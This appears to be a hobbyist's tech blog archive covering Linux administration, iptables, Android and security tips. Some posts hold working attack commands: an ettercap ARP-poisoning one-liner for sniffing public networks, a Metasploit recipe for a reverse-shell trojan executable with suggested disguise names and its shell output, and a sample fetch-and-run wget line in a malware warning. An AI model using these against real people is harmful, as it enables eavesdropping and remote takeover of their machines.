Basic Arp Poisoning with Ettercap

A simple one-liner in ettercap allows for the poisoning of a network to vastly improve the results gained in packet captures. This is a "noisy" method which will generate a large amount of traffic on a network and will be easily detected in any reasonably sophisticated infrastructure or by anyone running an IDS, however in small scale networks (a small business, coffee shop, public hotspot, etc.) it is unlikely to be noticed in the short run.

The quick and dirty:

root@zombi:~# ettercap -i wlan0 -T -q -M ARP /192.168.168.168/ //

This tells ettercap to use wireless inteface 0, go into Text mode, use quiet output, and start ARP poisoning the local gateway (in this instance, 192.168.168.168).

What ettercap will then do is start sending ARP reply packets to every other host on the network advertising the attackers machine as the correct route to send any packets destined for 192.168.168.168... that address being the gateway, this causes all traffic on the network that is outbound to the net to be sent through the attackers machine first where they can sniff or manipulate it at will.

As you can see, by firing up wireshark and telling it to filter for 'http' we can see the web traffic of other machines on the network, this packet being a simple weather update request from a smartphone on the network .. but you get the idea, it will show the attacker anything that's in clear text.

For information on how to Sniff encrypted connections, checkout these posts:
SSL Man In The Middle with Ettercap

Ettercap Revisited - sslstrip

Active Apache Defense

Running a web-server that is publicly accessible will quickly get one familiar with the onslaught of attempts to find vulnerable web applications on that site. Whether they are individual attackers, scripted scans, or just someone poking around, it's traffic you dont need and a source that you want nothing to with.. or rather, you want them to have nothing to do with your system.

This method, which was created with some collaboration with a peer of mine at school (who solved a huge security hole in it.. that whole escaping shell commands thing, pretty important), uses the apache mod_rewrite engine and a php/shell script combo to dynamically add iptables rules when specified urls are loaded against your server, the vast majority of the time a potential attacker will be banned before they even realize what happened.

First, create the php script, this one is about three revisions of tweaking and seems to work quite effectively...

testBan.php:

$banme=$_SERVER['REMOTE_ADDR'];
$myFile="ban.txt";
$fh = fopen($myFile, 'a') or die("Can't Open File");
fwrite($fh, $banme);
fwrite($fh, "\n");
fclose($fh);
$e = escapeshellcmd($banme);
system("/var/www/localhost/htdocs/sec/ignore.sh $e");
echo "
Security Violation: The IP Address $banme has been logged and added to the blacklist";

The echo is really for debugging purposes, there is no real need to let someone know that they've been banned.

ignore.sh:

#!/bin/bash

for i in $(cat ignorefile); do
    if [ $1 == $i ]
    then exit
    fi
done

sudo iptables -A INPUT -s $1 -j APACHE
echo $1 >> ignorefile
 
That iptables rule sends the traffic to a chain called APACHE, I like to direct it there for logging purposes, you could just as easily drop or reject the traffic outright.
Next, create or add to a .htaccess file in your web root directory and create rewrite rules based on the kind of access attempts you notice to be common. Collecting a group of these common attempts is pretty easy, just grep your apache error log for " 404 " and you will see large groups of attempts to find things like roundcube or phpmyadmin.

a basic mod_rewrite setup for looks like this:

RewriteEngine On

RewriteRule ^phpmyadmin/ /sec/testBan.php [R=301,L]

RewriteRule ^roundcube/ /sec/testBan.php [R=301,L]

RewriteRule ^XMBforum/ /sec/testBan.php [R=301,L]

RewriteRule ^webmail/ /sec/testBan.php [R=301,L]

There are plenty of more complex regex based rewrites you could use to trap even more attempts, these are just a simple example. Make sure none of your rewrites match a legitimate site URL or you'll end up blocking welcome traffic accidentally.

Ubuntu Full Disk Encryption

If you are installing ubuntu, you can setup Full Disk Encryption via an encrypted LVM as your root partition almost effortlessly. You just need to download the alternate disk rather than the normal live disk.

Example download file For 9.10 64bit:
http://ftp.ucsb.edu/pub/mirrors/linux/ubuntu/9.10/ubuntu-9.10-alternate-amd64.iso.torrent

When booted This disk will go into the old TUI style installer interface rather than booting a live Ubuntu session, however during the partitioning stage of the install there is an option available for a guided install using an encrypted LVM setup. After select and confirming that option, it will then prompt for a password... make it a good one, and one that you'll remember.

Using this method it is virtually impossible to boot into the operating system or read anything on the disk without knowing the password that you set, and attempting to crack the encryption would be a monumental and expensive effort.

Passwords Across Services

When I first got a gmail account I didnt take it too seriously, another random email, and so I set it up with a password that I commonly used as a "throwaway".. it was relatively weak and used on a few other sites, including ones that don't even bother with encryption; but again, why did I care? its some junk email site...

Then I started using google docs, then google analytics, google checkout, google adsense, blogger, and so on... the throwaway little junk email was suddenly responsible for a large portion of my online presense and tied to at least one credit card, and the other day I was logging into gmail and realised what i was typing... a weak password, used on multiple sites, with high exposure.

Needless to say, I went and changed it to somthing much stronger. In fact I took the opportunity to change most of my passwords to stronger alternatives, making sure to separate the secure and insecure sites, and I encourage everyone else to as well.

Take a moment and think about how many sites you use the same password for, google especially, and if any of those sites have a login in cleartext.

It's amazing how these things can just sneak up on people.


P.S. for the unaware, a strong password is longer than 8 characters and composed of letters, numbers, and symbols, or a sentence/phrase that's longer than 16 characters.

Sun LDAP Proxy

Since one of the ldap proxy systems i work with with decided to start having issues last week, today i took the time to go in and rebuild it... a pretty simple task in general, but again, nothing produced by sun has straightforward instructions.. at least not until someone that acctually uses their software writes them.

So with a little help from google, and a lot of references to help files, here is how to set up a Sun Directory Server Enterprise Edition proxy server that points to three back-end servers.

Jump into the DSEE dps6 toolbox, then create and start your proxy instance:

#cd /opt/SUNWdsee/dps6/bin
#./dpadm create /var/opt/SUNWdsee/ldap_proxy1
#./dpadm start /var/opt/SUNWdsee/ldap_proxy1/

Next we'll configure the instance with dpconf. If you get stuck, or need to know what else dpconf can do, the --help flag does at least provide a list of arguments:

#./dpconf --help

1. Create an ldap data source pool, you can then view it to make sure it was created.
#./dpconf create-ldap-data-source-pool ldap_pool
#./dpconf list-ldap-data-source-pools

2. Create your ldap data sources, you can name them whatever you want, I just used their hostnames, make sure the address of each is correct though.

#./dpconf create-ldap-data-source ldapserver1 ldapserver1.mydomain.org:389
#./dpconf create-ldap-data-source ldapserver1 ldapserver2.mydomain.org:389
#./dpconf create-ldap-data-source ldapserver3 ldapserver3.mydomain.org:389

3. Attach your data sources to the data pool, this can be done all in one command.
#./dpconf attach-ldap-data-source ldap_pool ldapserver1 ldapserver2 ldapserver3

4. Set the bind preference weights for each data store, you can set all the weights equally, or you can set some with higher weights than others to indicate preferred connections. Below we set ldap1 and ldap2 at a higher weight than ldap3, so ldap3 is only likely to be used if both 1 and 2 are already overloaded.

#./dpconf set-attached-ldap-data-source-

prop ldap_pool ldapserver1 add-weight:10 bind-weight:10 compare-weight:10 delete-weight:10 modify-dn-weight:10 modify-weight:10 search-weight:10
#./dpconf set-attached-ldap-data-source-prop ldap_pool ldapserver2 add-weight:10 bind-weight:10 compare-weight:10 delete-weight:10 modify-dn-weight:10 modify-weight:10 search-weight:10
#./dpconf set-attached-ldap-data-source-prop ldap_pool ldapserver3 add-weight:5 bind-weight:5 compare-weight:5 delete-weight:5 modify-dn-weight:5 modify-weight:5 search-weight:5
 

5. Set the bind dn for each data source, this is usually "Directory Manager" if your back-end is the standard sun setup.
#./dpconf set-ldap-data-source-prop ldapserver1 bind-dn:"cn=Directory Manager"
#./dpconf set-ldap-data-source-prop ldapserver2 bind-dn:"cn=Directory Manager"
#./dpconf set-ldap-data-source-prop ldapserver3 bind-dn:"cn=Directory Manager"

 

6. Set-up the bind password. You can't insert it as an argument by its self, you have to create a file that has your password in it, and then pass the set command that file as it's argument.

#echo secretbindpassword > pass
#./dpconf set-ldap-data-source-prop ldapserver3 bind-pwd-file:pass
#./dpconf set-ldap-data-source-prop ldapserver2 bind-pwd-file:pass
#./dpconf set-ldap-data-source-prop ldapserver1 bind-pwd-file:pass

7. Finally, point your default proxy data view at your ldap data source pool, and then restart the proxy instance.

#./dpconf set-ldap-data-view-prop root\ data\ view ldap-data-source-pool:ldap_pool
#./dpadm stop /var/opt/SUNWdsee/ldap_proxy1/
#./dpadm start /var/opt/SUNWdsee/ldap_proxy1/
 

 

If all is well you should now be able to bind and query against the ldap proxy, which will load balance connections between the backend servers according to the weights you set.

Build Your Own Trojan, pt.1

I somehow missed this magic of Metasploit but recently have scene some examples of it floating around the web. Metasploit allows you to simply encode a payload into a binary (.exe), so that it runs in the event that you can get a victim to execute that binary.

My first shot at this was sort of a "hello world" in my own network just to see it work, so I built a reverse connect binary called exploitme.exe using the following command:

root@oblivion:/pentest/framework3# ./msfpayload windows/shell/reverse_tcp LHOST=192.168.168.13,LPORT=4444 R > exploitme.exe

That basically says "when someone runs exploitme.exe, connect back to 192.168.168.13 on port 4444 and serve up a shell as the user that executed the exploit". I put that .exe on a local web-server so I could grab it on a windows box later.

Then on the attacker machine (.13) the same code essentially used as a handler, which just sort of hangs out and waits for the exploited machine to call home:

root@oblivion:/pentest/framework3# ./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.168.13 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:4444

So this, all by its self was way too easy... I hop on a windows7 machine and download exploitme.exe (of-course, if this were really an attempt to attack someone, better names include: setup.exe, crack.exe, avg_free.exe, limewirepro.exe, etc...). Anyway, once the executable is downloaded, and the user tries to run it, nothing seems to happen on their end (no real program is there in this version, just the exploit) and the waiting handler on the attackers machine is greeted with this:

[*] Starting the payload handler...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.168.13:4444 -> 192.168.168.24:51166)

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\Mozilla Firefox>

...awesome.

In the future I'll have a look at anti-virus evasion and more entertaining payloads than just a simple shell.

Sun Webserver7 - SSL

Dropping the following commands here so that I can reference them in the future, and since it was a pain in the ass to find the details in the first place maybe this will help someone else out too. As always with sun software, I'm amazed that somthing this simple is also so arcane.

Preparing a signed certificate:

bash# /usr/sfw/bin/openssl pkcs12 -export -out mycert.pk12 -in mycert.cer -inkey mycert.key -nodes -name "sslcert"

(where mycert.cer is the signed cert from your authority, and mycert.key is the private key you generated the original request with)

Adding the certificate to the local database:

bash# pk12util -i mycert.pk12 -d /var/opt/SUNWwbsrv7/https-my-domain.com/config/.

Setting up the https listener with that cert:

bash# /opt/SUNWwbsrv7/bin/wadm --user=admin --port=8800 --no-ssl

wadm> pull-config --config=my-domain.com my-domain.com

wadm> create-http-listener --listener-port=443 --default-virtual-server-name=my-domain.com --config=my-domain.com

wadm> set-ssel-prop --config=my-domain.com --http-listener-2 server-cert-nickname=sslcert enabled=true

wadm> deploy-config my-domain.com

victory

Handy Iptables Rules

Given that iptables is the main interface for the netfilter firewall built into linux, knowledge of how to use it is one of the greatest assets that a sysadmin can have. The following is a list of common, and not so common, iptables rules that I have used in the past.


#allow all return traffic from outbound connections
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

#never block localhost
iptables -A INPUT -s 127.0.0.1/32 -j ACCEPT

#allow access to ssh from a specific network
iptables -A INPUT -s 192.168.100.0/24 -p tcp -m tcp --dport 22 -j ACCEPT

#block all other access to ssh
iptables -A INPUT -p tcp -m tcp --dport 22 -j REJECT

#quick rule to block a specific ip
iptables -A INPUT -s 192.168.0.13 -j DROP

#create a new iptables chain
iptables -N BLACKLIST

#set rules to log and then reject all traffic sent to a chain
iptables -A BLACKLIST -j LOG --log-prefix "[BLACKLISTED]: "

iptables -A BLACKLIST -j REJECT --reject-with icmp-host-prohibited

#send all traffic from a specific ip to a chain
iptables -A INPUT -s 192.168.0.99 -j BLACKLIST

#send all traffic to a specific port to a chain
iptables -A INPUT -p tcp -m tcp --dport 31337 -j BLACKLIST

#create a chain for ssh and send all new ssh sessions to it
iptables -N SSH_CHECK

iptables -A INPUT -p tcp -m tcp --dport 22 -m state --state NEW -j SSH_CHECK

#rate limit ssh to prevent brute force attempts (any more than 4 connections in 60 seconds will be dropped), and log any such events.
iptables -A SSH_CHECK -m recent --set --name SSH --rsource

iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j LOG --log-prefix "SSH Brute Force: "

iptables -A SSH_CHECK -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j DROP

#Forward a port to another ip address using NAT
iptables -t nat -A PREROUTING -p tcp -m tcp --dport 9001 -j DNAT --to-destination 192.168.0.100

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#Allow only a specific user to connect out to a certain port 
iptables -A OUTPUT -p tcp --dport 22 -m owner ! --uid-owner username -j REJECT

#Forbid a specific user from connection out to a port 
iptables -A OUTPUT -p tcp --dport 4444 -m owner --uid-owner root -j REJECT

Smoked Glass Rom

New release of Adamz's smoked glass rom for the Motorola Droid came out yesterday, so ofcourse I immediately re-flashed my phone (there goes that Linux ocd again..). This thing is fast, pretty, and powerful, and if you run a rooted Droid or are willing to take that plunge then i wholly suggest this rom.

Smoked Glass v4.5

....
February 19, 2010
- Created custom kernel with 9 Processor Slots (More than enough to suit all needs)
- - 250, 400, 550, 600, 700, 800, 900, 1000, 1100 MHz Processor Slots
--- Processor Temperature Monitoring (Almost had it... but without sholes.info's repo I wouldn't have gotten what I was missing)
- - DMA Race Conditioning (thanks to sholes.info's great repo!)
--- Updates from 2.6.32 to fix Brightness and Touchscreen Issues (thanks to t3hSteve for posting the patch)
- - Nand Prefetch
- - Wi-Fi Tether
- Fixed Lockscreen Images in Landscape (I have NO idea how I did that...)
- Added xeudoxus' Launcher2.apk with fixed homescreen position.
- Removed Links for Extra Overclocking and Extra Overclocking Instructions
....


A note on rooting / flashing roms: everyone always gives the warning that it's potentially dangerous, it could brick your phone, things may not work right, etc. However i've yet to find anyone who, following proper backup/restore procedures, has had any problems that weren't immediately fixable.

That being said, I ofcourse am not liable for you messing up your phone just because I endorse this awesome software.

transfering files to android

Yet another use for netcat...

Not having an ftp server handy and wanting to transfer a new ROM to my Droid, I tried to find the simplest method possible without the nuisance of plugging in the usb... maybe i'm just obsessed with netcat lately. This should work on any rooted android device with busybox installed.

server (192.168.168.13):

$cat new_rom.zip | nc -l -p 8080

droid (on the 192.168.168.0/24 wireless):

$$ su
#cd /sdcard
#busybox nc 192.168.168.13 8080 > new_rom.zip

Instant Messengers and Encryption

Instant messaging services are remarkably still common for average net users to employ on a daily basis, however many (perhaps the majority) don't realize that on most networks every message they send is in clear-text and can be read by anyone else on their local network (like some creepy guy in Starbucks, or a hacker on your campus wireless).

Both AIM and GoogleTalk have an SSL option, why it's not enabled by default is something I don't quite grasp.. but you should be able to turn it on in your client. I happen to use pidgin, so for me the SSL options look like this.
 

 


















As long as you have "use SSL" or "Require SSL" then your logins and communications should be safe from casual eavesdroppers.

As for msn/hotmail, their IM appears to send login credentials over a TLS encrypted connection.. so at least no one can sniff your username/password and get into your account, but after that it drops to a normal plain-text connection and all of your messages can be sniffed.

Facebook's new XMPP service is the worst of the lot, it expressly advertises that it doesnt in any way support encryption, advising users to uncheck the ssl option for XMPP. This makes using a facebook chat in a public location extremely vulnerable.

The only options for securing msn or facebook XMPP is to set up an encrypted socks5 tunnel and point those messenger accounts at it, this can be done using an SSH tunnel if you have a public facing Unix system available to you (ssh -D1234 username@fqdn).

If you use the IM client Pidgin, there are some awesome encryption plugins. Checkout "Pidgin Encryption" and "OTR Messaging". Both require that each party of the conversation have the plugin installed, but it virtually guarantees covert communications, encrypted even to the service provider.

cryptcat

Just noticed this in backtrack4, cryptcat is just like netcat only creates encrypted connections instead. The only downside is that you need cryptcat on both ends of the connection.

Make sure to use the -k flag to change the encryption key, otherwise it reverts to a hardcoded known key.. which kinda defeats the point.

server (1.2.3.4):

cryptcat -k mykey -l -p 4444 

client:

cryptcat -k mykey 1.2.3.4 4444

win!

Hackers still target telnet

Anyone that runs a server with a public ip address is familiar with the constant onslaught of various attacks, most of which are against some means of authentication in order to gain access to the system. This means we see a lot of access attempts to ssh, rdp, smtp, and.. telnet? Yes, way too many systems out there still run telnet so it's a perfectly valid target for hackers.

How bland though, and such a waste of bits, they either never find a socket.. and die.. hit the firewall and die.. or trigger an ids and die. At least with ssh or rdp there may be legitimate services at risk that im protecting, but telnet simply isn't there in any environment I run... or is it?

New idea.. make badguys think they've got a live telnet target to attack, while at the same time seeing what's currently in vogue for brute force username/password attempts. Pull out your trusty netcat and a short script for this one, we'll build a dummy telnet service that simply logs all access attempts.

#vi /scripts/my_telnet.sh
   #!/bin/bash
   echo -n "username: "
   read a
   echo -n "password: "
   read b
   echo "username: $a" >> attempts.txt
   echo "password: $b" >> attempts.txt


#while true; do nc -l -e "/scripts/my_telnet.sh" -p 23 >> attempts.txt"; done


Just another fun thing to play with on a non-production box.

nonsense, at least once a week

Today's project was to build a VPN and see what I could do with it... now note, as someone pursuing a degree in the computer field, no class im required to take has ever touched the concept of encrypted communications or secure networks... food for thought and an issue Im still trying to find a way to solve.. not really for myself, its a bit late, but for future students.
Anyway, personal interest and study led me to researching the topic. I started with studying SSH tunnels, using them as socks5 proxies or for port forwarding; and then today finally tackling the whole VPN issue. Setting up a VPN server in Linux was remarkably simple, much less intimidating than I had imagined.. and now i'm looking into possible uses for such a network, just for fun.
http://en.gentoo-wiki.com/wiki/OpenVPN
...
meanwhile, apple is persecuting anyone that tries to hack their iphone firmware by cutting their access to apple run services.. jailbreaking your iphone gets you on job's naughty list. I've been playing more with droidrootpro and the flashing of hacked roms to my droid. If you own a device, you should be able to do anything you want with it.. Apple, you used to be cool..
http://www.androidzoom.com/android_applications/tools/droidrootpro_bqal.html
...
My home surveillance system is now finalized and Ive found that unless you're paying for an IR system or something seriously fancy, a basic camera set-up shouldnt cost more than 50 bucks... webcams and motion detection software go a long long way (particularly with motion triggered lighting outside).
....
Small plug for the playstation media server (PMS.. yeah..), streaming media off of any system to your ps3 is fairly awesome. Its java based so its operating system independent, as long as you have the codec support for ffmpeg and mencoder.
http://ps3mediaserver.blogspot.com/

wicd triggered ssh tunnels

I noticed something spiffy about the wicd network manager today, it has a section that allows you to trigger scripts at certain points of the connection process.. specifically interesting to me were post-connect and post-disconnect.

For a long time I've been trying to tell people that if at all possible they should tunnel their wireless traffic through an ssh connection whenever possible if they are on a public or insecure wifi. The problem with this is twofold, the first is that not everyone has access to a machine that they can use as an ssh tunnel exit point, and the second is that they have to open a terminal and manually set up the connection.. anything that takes effort like that, people are likely to forget or not bother with. I cant help people who have no publicly accessible Unix shell, but for those that do we can make having an available ssh tunnel a constant option.

So! enter wicd and its automatic script launching on connect... we'll set up a public key authorization login on the ssh server, write a tunnel script that will run in the background, and simply tell wicd that any-time we connect to the wireless to run the script.

For those unfamiliar with Public Key Authentication:

it is an ssh authentication method that uses a generated rsa certificate rather than a password, effectively creating a trust between the account on your laptop and the account on the server (never do this with root, and for this you don't even need to use an account that has sudoer access).



On your client machine (your laptop), run the following

   $ssh-keygen -q -f ~/.ssh/id_rsa -t rsa

   $chmod -R 700 ~/.ssh

   $scp ~/.ssh/id_rsa.pub my.sshserver.org:

On the server account run these

   $mkdir ~/.ssh

   $mv id_rsa.pub ~/.ssh/authorized_keys

   $chmod 700 ~/.ssh

   $chmod 600 ~/.ssh/authorized_keys

Finally, back on the client side open an ssh connection as follows:

   $ssh -o PreferredAuthentications=publickey my.sshserver.org

As for the ssh connection script..

I like to have a /scripts folder where i drop any tools i make myself, especially oneliners like this, so i recommend making a new file in /scripts called ssh_tunnel.sh, which will consist of two whole lines.

   $vim ssh_tunnel.sh

   #!/bin/bash

   ssh -f -N -D9999 -i /home/username/.ssh/id_rsa username@my.sshserver.org

This creates an ssh tunnel that is listening on localhost port 9999 (-D), expects no further commands (-N), and is forked to the background (-f), to my ssh server out on the internets. Also, since we setup public key authentication, it wont prompt for a password.

Any program now that allows proxying, such as a webbrowser, I can point at 127.0.0.1 on port 9999 and it will push all of the traffic through the encrypted connection.

And finally, wicd:   
Before you connect to an access point, click on the properties button, and then the scripts button. There you will see four blank lines, one of the should be "Post-connection Script". On that line, just enter the location of your ssh script, in our case /scripts/ssh_tunnel.sh.


Now, in the event that you loose your connection its possible that the ssh_tunnel process will remain active even though the session will die.. in that event you may want to put a Post-disconnect Script in place that issues a "pkill ssh", which should take care of that issue.

That's it, you will have an encrypted tunnel at your disposal whenever you think you might need one, without having to touch the terminal again or remember the needed commands.

cloud storage

shameless plug for dropbox... im really enjoying being able to so easily store and share files. I set it up on my server, a windows machine, a couple ubuntu systems, and even my droid (droidbox, pay the 2 bucks for it).We will see how long it takes me to fill up the free storage space.

UPDATE: Using dropbox to share project files and collaborate for college course work is pretty awesome. It beats svn in usability, though it's not quite as reliable.

Server goes boom?

UPDATE: Recovery went smoothly and my server has been humming away without any further issues. Here's to gentoo, and here's to linode.

My linode was involved in some kind of horrific serverroom accident which left it in a pretty funky state once they got the surviving disks into a working box. Luckily linode has its own recovery live image called "finnix", pretty spiffy. Boot with that, chroot into gentoo, and see if i can bring it back from the dead...

Since I keep forgetting the sequence,
im just gonna leave this here:

# mount /dev/hda3 /mnt/gentoo
# mount /dev/hda1 /mnt/gentoo/boot
# mount -t proc none /mnt/gentoo/proc
# mount -o bind /dev /mnt/gentoo/dev

# cp -L /etc/resolv.conf /mnt/gentoo/etc/resolv.conf

# chroot /mnt/gentoo /bin/bash
# env-update
# source /etc/profile
# export PS1="(chroot) $PS1"
(chroot) #

weekend projects

So after messing with the netbook surveillance thing for a while I decided to actually make a more permanent solution. I went out and got a cheap little webcam, stuck it in my front window to monitor the front of the house, and using the same basic config on the server in my living-room got it all rigged up to record anything that happens throughout the day. The next step is to setup dns for my home IP again so i can check in on the camera while im not home, and maybe to setup something like dropbox so the video captures it creates are stored in "the cloud". ll in all its a pretty decent home surveillance setup for under 50 bucks.

Setup an ubuntu server and messed with the ubuntu firewall (since it overrides iptables, and iptables overrides it... this is just dumb, but whatever). Nothing much is new, but for those of you using portsentry to secure your ubuntu box, ROUTE_KILL should be "/usr/sbin/ufw deny from $TARGET$".

Facebook app for the android phone is pretty nifty, uploading photos straight from the program is nice and smooth. Yeah... using facebook, and blogging, and twittering... I've been corrupted by the internet.

Turning a netbook into a surveilance device, part 1

Ive started a fun little side project of turning a netbook into a portable home security terminal. I'm starting simple, of-course, with a stationary (but portable) surveillance camera / dvr with two way audio.

The idea just originated with the fact that in our house you can hear someone at the door unless you're in the living-room and we typically leave the wooden door open with the security screen closed, so a camera could see through the screen if one were placed there and I could then have a feed in any room of the house or in the backyard showing me the front door. However this may evolve into something more permanent and less hackey as recently a ups shipment that was scanned in as delivered to my house, was no where to be found.

The netbook is a 1000HA eeepc and is currently running backtrack4, effectively ubuntu linux 9.10, and has essentially all the hardware one would desire in a cheap home surveillance camera (it is on temporary hiatus from the gentoo netbook project while I play with backtrack).

• decent camera - check.
• audio out - check
• microphone - check
• wifi - check
• 6+ hours of battery life - check

Video streaming / DVR

I stumbled upon a package in ubuntu called "motion" which is a dvr/webserver for webcam based video inputs, and records images/video based on motion-detection software... perfect!

First, Install the package

#apt-get install motion

Next, edit the config file

#vim /etc/motion.conf

I set the following values:

• width 352
• height 288
• framerate 10
• threshold 500 (much higher sensitivity for motion based recording)
• target_dir /e/dvr (which is a mounted network share to a storage server)
• webcam_maxrate 10

Finally just restart the motion server and it will be streaming whatever the camera is pointed at on port 8081, and will record images/videos whenever motion beyond the threshold is detected.

#/etc/init.d/motion restart

Top 10 android apps - My Favorites

DroidRootPro

• For those of us with rooted Droid phones, this app makes installing the recovery system, specialized themes, and all the base files needed for flashing new roms to the device as easy as pressing a few buttons.

Google Listen

• Podcast browser/downloader/player that keeps an updated list of subscriptions and downloads the latest episodes for you in the background. Really great for downloading your favorite podcasts to listen to on the road.

AndFTP

• For the want of an accessible sd-card... AndFTP is a simple and effective ftp client for android that makes moving files to and from the phone wireless and easy without the need for bluetooth.

PdaNet

• The coolest of the bunch, this uses paired software on the phone as well as your computer to enable tethering, and it doesn't even need root to do it. The software on your computer sets up a TUN modem driver and the tether is done through usb or bluetooth.

Twidroid

• So I used to hate the very existence of twitter, but lately I've found it to be an invaluable source of information, and Twidroid lets me keep up with the constant feed while on the go.

Shopsavvy

• Mostly as a byproduct of being a college student and needing to occasionally buy insanely overpriced books, this has become a necessity. Scan the book's (or anything's) barcode with your camera, and shopsavvy will find the lowest offered prices locally as well as online.

Password Safe

• Encrypted vault for sensitive information. I actually don't use it for passwords, but for other sensitive information that i need to remember details of while keeping secure. This app has tons of templates and uses a master password to unlock.

Astro Player

• We don't have an audible.com app yet, but Astro Player will play audiobooks (actually it will play just about any audio format I can find), and its also good to have a spare audio player so that you can play music on the normal player without loosing you place in the audiobook in Astro.

Connectbot

• It's Linux, we must have ssh.

Wifi Analyzer

• Fun and handy app that graphically displays local wifi signals on a graph, showing their relative strength and which channels they are on or interfere with. Very useful when setting up a new access point.

False Security

Get a Mac so that you don't have to worry about viruses...

Linux is immune to malware...

Only windows users have to worry about security software...


If I were a "bad guy", MacOSX and to a lesser extent, Linux, are the platforms I would be targeting right now for spreading virii and botnets. This is simply because you can depend on the majority of end users to naively click anything on the web, follow bogus instructions, and not have an antivirus installed, since they're running a system that's "invulnerable".

Since most malware these days that people get infected with is designed not to exploit the system on its own to gain access, but merely to trick the user into installing it themselves, the less paranoid your target is the more likely they are to get infected.

Trojan .dmg file for OSX:

 

Linux is a little harder due to the repository system, users dont typically download software off of a website. However, alot of system fixes, driver fixes, or advanced setups use shell scripts and those scripts almost always require root permissions. If you grab someones several hundred line script to setup/fix somthing for you, whats stopping them from having embedded a couple lines which fetch and install a malicious piece of software as well? Unless you read the script entirely and know what you are doing, or it came from a well reviewed source, there is no assurance that it is safe to use.

example... in the middle of some random script you found is this: 
...
wget fakedomain.cn/x/tmp.sh
sh tmp.sh
rm tmp.sh
...

you gave root/sudoer permission to the script initially (to fix your problem, get that driver to work, setup a service for you, etc..) , and you have no idea what tmp.sh does. Most users wont notice the new daemon that's running in the background if its not using up too much in the way of resources, just like in Windows.

Stop telling people to use either system so that they don't need to worry about viruses. Unix systems are more secure in general, there is less malware out there for them right now, but they are not immune to being infected.

All computer users should exercise some common sense and maintain a bit of healthy distrust.

Blogaway 3.0

Testing out the blogaway android app on my Motorola droid. it seems pretty slick and feature rich so far. Trying its image upload, which is tied into picasa, with a picture of my street after a recent rain storm.

Mastering Iptables

@SecurityTube pointed out this three part series on how to use Iptables in Linux, and, since they contain some awesome info for anyone interested in Linux security, I'm embedding them here as well.













These videos go from the basic concepts of iptables to intermediate usage and are the same source I started with when learning. Have a system available to play with, and pause/repeat often.

Also check out my listing of useful Iptables rules.

Programming Tutorials

Links to programming tutorials that i find helpful:

C++
-http://www.cplusplus.com/doc/tutorial/
Java
-http://www.freejavaguide.com/corejava.htm
Perl
-http://www.tizag.com/perlT/perlfirstscript.php
Python
-http://www.python.org/doc/2.5.2/tut/node5.html
Ruby
-http://www.fincher.org/tips/Languages/Ruby/
-http://ruby-doc.org/docs/ProgrammingRuby/ (Recommended by aking1012 @amcomworks)

--------------------------------
Video Tutorials
-http://securitytube.net/Programming-Video-List.aspx  (thanks to Ramaz @securitytube)
--These include basic primers on C, assembly, and some python as well as many videos about security related programming.
--------------------------------
Related Study
-http://bit.ly/9PjVxg A complete reference manual to the linux kernel (Courtesy of aking1012 @amcomworks)


Chances are good that this post will be revised whenever i find more links to add.

Windows 7: six month review

It has now been 6 months that i have forced myself to use Windows as my primary OS and my general impression with it is fairly good. This was a project to just re-familiarize myself with the windows OS so that I wouldn't completely loose touch with its ins and outs, and also to pull myself back from the "whichever system i don't use SUCKS" mentality that is so prevalent in the tech world (trying to stay out of the droid/iphone flamewars too...).

Pros:

• Windows 7 is actually stable for the most part, I haven't had a single system freeze or bsod.
• Management of system resources seems much improved, can't argue with the speed and multitasking efficiency.
• The days of required periodic reboots are gone, I've only had to reboot once to solve a problem (sound had stopped working, who knows? just reboot...)
• Security seems to finally be taken seriously by Microsoft, the system's networking is much more locked down and almost everything runs with limited permissions.
• Thanks to open development, most software that you need now has a free equivalent, which was one of the major draws to linux.
  

Cons:

• For some reason when i unplug my laptop, the video driver crashes... in the Linux world i would be able to fix that in the config, or work with an open development team on the problem. In windows i just have to wait for Microsoft to fix it, if it ever gets fixed at all
• The windows shell is still not intuitive to use, powershell is a bit better than CMD but still missing a lot of the functionality that BASH has.
• Compatibility Mode is NOT a feature! it's a patch that is a pain in the ass.. having to tell a program to run under legacy dlls and system parameters to get it to work at all is just a bad way to manage applications.
• Windows Firewall still seems to have limited functionality and a poor user interface... can we just have a cli like iptables for it please?
• And as always, the cost... software that costs hundreds of dollars should be superior in every way to similarly purposed software that is free. I do not see the value in windows 7 that justifies its cost.
  

I didn't include anything about games.. because i'm not a gamer. However, I've seen some awesome videos of people running Crysis on their Gentoo rigs..

I can see Windows 7 being a decent system for most people, Most of my complaints lean towards the geeky side and most people wouldn't really care about them an most people are willing to pay the money for the OS that is familiar to them. I think Win7 has pulled Microsoft's ass out of the fire after that horrible darkages they brought on known as "vista".

Haven't decided what system to run now, time to browse distrowatch or something...